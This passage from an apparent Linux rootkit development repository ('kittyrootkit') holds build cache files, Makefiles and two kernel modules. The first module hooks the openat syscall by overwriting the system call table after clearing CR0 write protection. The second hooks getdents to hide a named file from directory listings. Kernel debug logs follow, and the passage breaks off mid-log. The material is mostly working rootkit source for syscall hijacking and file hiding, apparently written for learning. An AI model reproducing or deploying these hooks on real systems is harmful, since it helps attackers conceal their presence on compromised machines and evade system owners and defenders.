fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_date-time";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=date-time 67 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_incompatible-pointer-types";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=incompatible-pointer-types 68 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_designated-init";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=designated-init 69 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-fcf-protection_none_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fcf-protection_none";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 70 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-fmacro-prefix-map_./__-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fmacro-prefix-map_./_";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 71 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___ar_rcD_"_TMP"__>/dev/null_2>&1;_then_echo_"D";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := D 72 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-Wpacked-not-aligned_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-packed-not-aligned";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 73 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc__-Wl_--build-id_-D__KERNEL_____-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-nostdlib_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-Wl_--build-id";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wl,--build-id 74 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module06_hooking_sysopen/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | MODULE_LICENSE("GPL"); 13 | MODULE_AUTHOR("SourceCodeDeleted"); 14 | MODULE_DESCRIPTION("Simple Hooking Of a Syscall"); 15 | MODULE_VERSION("1.0"); 16 | 17 | 18 | unsigned long **SYS_CALL_TABLE; 19 | 20 | 21 | 22 | void EnablePageWriting(void){ 23 | write_cr0(read_cr0() & (~0x10000)); 24 | 25 | } 26 | void DisablePageWriting(void){ 27 | write_cr0(read_cr0() | 0x10000); 28 | 29 | } 30 | 31 | // bool StartsWith(const char *a, const char *b) 32 | // { 33 | // if(strncmp(a, b, strlen(b)) == 0) return 1; 34 | // return 0; 35 | // } 36 | 37 | 38 | //define our origional function. 39 | asmlinkage int ( *original_open ) (int dirfd, const char *pathname, int flags); 40 | 41 | 42 | 43 | 44 | 45 | //Create Our version of Open Function. 46 | asmlinkage int HookOpen(int dirfd, const char *pathname, int flags){ 47 | 48 | char letter ; 49 | int i = 0; 50 | 51 | char directory[255]; 52 | char OurFile[14] = "breakpoints"; 53 | 54 | 55 | while (letter != 0 || i < 6){ // if (letter == 0x41 || letter < 0x7a) Maybe to prevent bad chars from entering string buffer 56 | //This macro copies a single simple variable from user space to kernel space. 57 | //So this will copy pathname[i] to ch; 58 | get_user(letter, pathname+i); 59 | directory[i] = letter ; 60 | i++; 61 | } 62 | 63 | if (strcmp(OurFile , directory ) == 0 ){ 64 | printk(KERN_INFO "File Accessed!!! %s", directory); 65 | } 66 | memset(directory, 0, 255); 67 | 68 | 69 | // Jump to origional OpenAt() 70 | return (*original_open)(dirfd, pathname, flags); 71 | } 72 | 73 | 74 | 75 | 76 | 77 | // Set up hooks. 78 | static int __init SetHooks(void) { 79 | // Gets Syscall Table ** 80 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 81 | 82 | printk(KERN_INFO "Hooks Will Be Set.\n"); 83 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 84 | 85 | // Opens the memory pages to be written 86 | EnablePageWriting(); 87 | 88 | // Replaces Pointer Of Syscall_open on our syscall. 89 | original_open = (void*)SYS_CALL_TABLE[__NR_openat]; 90 | SYS_CALL_TABLE[__NR_openat] = (unsigned long*)HookOpen; 91 | DisablePageWriting(); 92 | 93 | return 0; 94 | } 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | static void __exit HookCleanup(void) { 103 | 104 | // Clean up our Hooks 105 | EnablePageWriting(); 106 | SYS_CALL_TABLE[__NR_openat] = (unsigned long*)original_open; 107 | DisablePageWriting(); 108 | 109 | printk(KERN_INFO "HooksCleaned Up!"); 110 | } 111 | 112 | module_init(SetHooks); 113 | module_exit(HookCleanup); 114 | 115 | 116 | //STRACE 117 | /* 118 | root@anonHost:~# strace cat somefile 119 | execve("/bin/cat", ["cat", "somefile"], 0x7ffd43175fe8 ) = 0 120 | brk(NULL) = 0x5614699df000 121 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 122 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 123 | openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 124 | fstat(3, {st_mode=S_IFREG|0644, st_size=169782, ...}) = 0 125 | mmap(NULL, 169782, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f459a155000 126 | close(3) = 0 127 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 128 | openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 129 | read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832 130 | fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0 131 | mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f459a153000 132 | mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f4599b67000 133 | mprotect(0x7f4599d4e000, 2097152, PROT_NONE) = 0 134 | mmap(0x7f4599f4e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f4599f4e000 135 | mmap(0x7f4599f54000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f4599f54000 136 | close(3) = 0 137 | arch_prctl(ARCH_SET_FS, 0x7f459a154540) = 0 138 | mprotect(0x7f4599f4e000, 16384, PROT_READ) = 0 139 | mprotect(0x56146832f000, 4096, PROT_READ) = 0 140 | mprotect(0x7f459a17f000, 4096, PROT_READ) = 0 141 | munmap(0x7f459a155000, 169782) = 0 142 | brk(NULL) = 0x5614699df000 143 | brk(0x561469a00000) = 0x561469a00000 144 | openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3 145 | fstat(3, {st_mode=S_IFREG|0644, st_size=4547104, ...}) = 0 146 | mmap(NULL, 4547104, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f4599710000 147 | close(3) = 0 148 | fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0 149 | openat(AT_FDCWD, "somefile", O_RDONLY) = 3 150 | fstat(3, {st_mode=S_IFREG|0644, st_size=46, ...}) = 0 151 | fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0 152 | mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f459a15d000 153 | read(3, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 131072) = 46 154 | write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 46aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 155 | ) = 46 156 | read(3, "", 131072) = 0 157 | munmap(0x7f459a15d000, 139264) = 0 158 | close(3) = 0 159 | close(1) = 0 160 | close(2) = 0 161 | exit_group(0) = ? 162 | +++ exited with 0 +++ 163 | 164 | */ -------------------------------------------------------------------------------- /module06_hooking_sysopen/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-119 2 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-129 3 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-149 4 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-159 5 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module07_hooking_getdents/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module07_hooking_getdents/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module07_hooking_getdents/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | 14 | MODULE_LICENSE("GPL"); 15 | MODULE_AUTHOR("SourceCodeDeleted"); 16 | MODULE_DESCRIPTION("Hide File Module"); 17 | MODULE_VERSION("1.0"); 18 | 19 | 20 | unsigned long **SYS_CALL_TABLE; 21 | 22 | 23 | 24 | void EnablePageWriting(void){ 25 | write_cr0(read_cr0() & (~0x10000)); 26 | 27 | } 28 | void DisablePageWriting(void){ 29 | write_cr0(read_cr0() | 0x10000); 30 | 31 | } 32 | 33 | 34 | 35 | //define our origional function. 36 | // Credit this author. 37 | // https://zuliu.me/2018/03/22/rootkit/ 38 | // My code was similar but had a few problems. Zuliu had a few better in his code. 39 | /* 40 | int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count); 41 | int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); 42 | */ 43 | 44 | 45 | struct linux_dirent { 46 | unsigned long d_ino; /* Inode number */ 47 | unsigned long d_off; /* Offset to next linux_dirent */ 48 | unsigned short d_reclen; // d_reclen is the way to tell the length of this entry 49 | char d_name[]; // the struct value is actually longer than this, and d_name is variable width. 50 | }*dirp2 , *dirp3 , *retn; // // dirp = directory pointer 51 | 52 | 53 | 54 | 55 | char hide[]="secretfile.txt"; 56 | 57 | 58 | asmlinkage int ( *original_getdents ) (unsigned int fd, struct linux_dirent *dirp, unsigned int count); 59 | 60 | //Create Our version of Open Function. 61 | asmlinkage int HookGetDents(unsigned int fd, struct linux_dirent *dirp, unsigned int count){ 62 | 63 | struct linux_dirent *retn, *dirp3; 64 | int Records, RemainingBytes, length; 65 | 66 | Records = (*original_getdents) (fd, dirp, count); 67 | 68 | if (Records <= 0){ 69 | return Records; 70 | } 71 | 72 | retn = (struct linux_dirent *) kmalloc(Records, GFP_KERNEL); 73 | //Copy struct from userspace to our memspace in kernel space 74 | copy_from_user(retn, dirp, Records); 75 | 76 | dirp3 = retn; 77 | RemainingBytes = Records; 78 | 79 | 80 | while(RemainingBytes > 0){ 81 | length = dirp3->d_reclen; 82 | RemainingBytes -= dirp3->d_reclen; 83 | 84 | printk(KERN_INFO "RemainingBytes %d \t File: %s " , RemainingBytes , dirp3->d_name ); 85 | 86 | if(strcmp( (dirp3->d_name) , hide ) == 0){ 87 | memcpy(dirp3, (char*)dirp3+dirp3->d_reclen, RemainingBytes); 88 | Records -= length; // dirp3->d_reclen; // leads to mistake? 89 | } 90 | dirp3 = (struct linux_dirent *) ((char *)dirp3 + dirp3->d_reclen); 91 | 92 | } 93 | // Copy the record back to the origional struct 94 | copy_to_user(dirp, retn, Records); 95 | kfree(retn); 96 | return Records; 97 | } 98 | 99 | 100 | // Set up hooks. 101 | static int __init SetHooks(void) { 102 | // Gets Syscall Table ** 103 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 104 | 105 | printk(KERN_INFO "Hooks Will Be Set.\n"); 106 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 107 | 108 | // Opens the memory pages to be written 109 | EnablePageWriting(); 110 | 111 | // Replaces Pointer Of Syscall_open on our syscall. 112 | original_getdents = (void*)SYS_CALL_TABLE[__NR_getdents]; 113 | SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)HookGetDents; 114 | DisablePageWriting(); 115 | 116 | return 0; 117 | } 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | static void __exit HookCleanup(void) { 126 | 127 | // Clean up our Hooks 128 | EnablePageWriting(); 129 | SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)original_getdents; 130 | DisablePageWriting(); 131 | printk(KERN_INFO "HooksCleaned Up!"); 132 | } 133 | 134 | module_init(SetHooks); 135 | module_exit(HookCleanup); 136 | 137 | /* 138 | Default - 139 | 140 | Feb 2 12:45:28 ForeignHost kernel: [ 1670.710680] HooksCleaned Up! 141 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668154] Hooks Will Be Set. 142 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668155] System call table at 00000000a21b68dc 143 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104769] File Found .kittyrootkit.o.cmd 144 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104772] File Found .cache.mk 145 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104774] File Found .main.o.cmd 146 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104776] File Found main.o.ur-safe 147 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104778] File Found testfile 148 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104779] File Found modules.order 149 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104781] File Found kittyrootkit.ko 150 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104782] File Found Module.symvers 151 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104784] File Found kittyrootkit.mod.o 152 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104786] File Found .kittyrootkit.ko.cmd 153 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104787] File Found .vscode 154 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104789] File Found secRecordsfile.txt 155 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104790] File Found main.c 156 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104791] File Found test.txt 157 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104793] File Found .. 158 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104794] File Found kittyrootkit.o 159 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104796] File Found .kittyrootkit.mod.o.cmd 160 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104797] File Found main.o 161 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104799] File Found kittyrootkit.mod.c 162 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104800] File Found .RemainingBytes_versions 163 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104802] File Found . 164 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.921168] File Found . 165 | 166 | 167 | 168 | 169 | 170 | Should be - 171 | Feb 2 12:45:28 ForeignHost kernel: [ 1670.710680] HooksCleaned Up! 172 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668154] Hooks Will Be Set. 173 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668155] System call table at 00000000a21b68dc 174 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104769] File Found .kittyrootkit.o.cmd 175 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104772] File Found .cache.mk 176 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104774] File Found .main.o.cmd 177 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104776] File Found main.o.ur-safe 178 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104778] File Found testfile 179 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104779] File Found modules.order 180 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104781] File Found kittyrootkit.ko 181 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104782] File Found Module.symvers 182 